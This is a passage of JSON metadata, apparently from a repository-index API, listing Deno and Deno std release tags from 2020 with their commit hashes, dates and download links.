/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https:/